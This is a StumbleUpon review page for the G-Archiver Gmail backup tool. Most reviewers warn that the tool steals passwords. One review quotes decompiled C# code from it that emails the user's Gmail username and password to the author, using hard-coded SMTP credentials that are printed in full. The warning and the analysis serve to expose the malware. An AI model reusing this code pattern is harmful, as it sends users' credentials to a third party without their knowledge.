Website review: Gmail inbox backup - Gmail emails b...

MattKeegan MattKeegan discovered this in Internet 11 reviews since Oct 18, 2007
icon tagsinternet garchiver.com

Thumbs up People who like this website

miller250
Victoria
metros
Texas
MattKeegan
Cary
imed5
England
yamidesign
Belgium
profitline
Singapore
pedrooz
ACT

StumbleUpon is the best way to discover great web sites, videos, photos, blogs and more - based on your interests. Everything is submitted and rated by the community. Discover, share and review the best of the web!

Thumbs up Reviews of this website

MattKeegan discovered 10 months ago
You can increase your Google inbox (big as it already is) to hold more data thanks to this nifty tool!
MaximumTaco rated 5 months ago
This program is a password thief. BEWARE.
dapaintballer331 rated 5 months ago
DO NOT USE.
dreamsindigital rated 5 months ago
I wouldn't use this until I was certain the coding issues (that send your account info and pass to the developer) were a thing of the past, even then I'd be skeptical.
krisu0100 rated 5 months ago
Don't use it: http://www.ghacks.net/2008/03/11/beware-of-g-archiver/
LeonZ rated 5 months ago
Ha! Nifty tool! http://www.codinghorror.com/blog/archives/001072.html ha....err...
Jordan117 rated 5 months ago
The worst kind of malware. It's coded to funnel your Google account username and password to the program author!
JDMF rated 5 months ago
DO NOT USE THIS SOFTWARE. It sends an email to the author of the software with your gmail username and password. Read about it here: http://www.codinghorror.com/blog/archives/001072.html I confirmed this using the .NET Reflector. The author has hard-coded his username and password into the code. A code sleuth has since logged into the author's account and changed the author's login info, so the hard-coded info won't work anymore (i.e., it can't send your info using his login credentials). Here's actual C# code from disassembly: public static void CheckConnection(string a, string b) { try { MailMessage message = new MailMessage(); message.To.Add("JTerry79@gmail.com"); message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8); message.Subject = "Account"; message.SubjectEncoding = Encoding.UTF8; message.Body = "Username: " + a; message.Body = message.Body + "\r\nPassword: " + b; message.BodyEncoding = Encoding.UTF8; message.IsBodyHtml = false; message.Priority = MailPriority.High; SmtpClient client = new SmtpClient(); client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482"); client.Port = 0x24b; client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Send(message); } catch (Exception) { } } This code block creates an email message containing your username and password and sends it to JTerry79@gmail.com (the author of the software) through his own gmail account. See his login info? See where he's creating a message with a Username and Password? That's *your* username and password.
criminallysane rated 10 months ago
another invaluable tool for gmail users who use it to store huge stuff
This page is not affiliated with garchiver.com.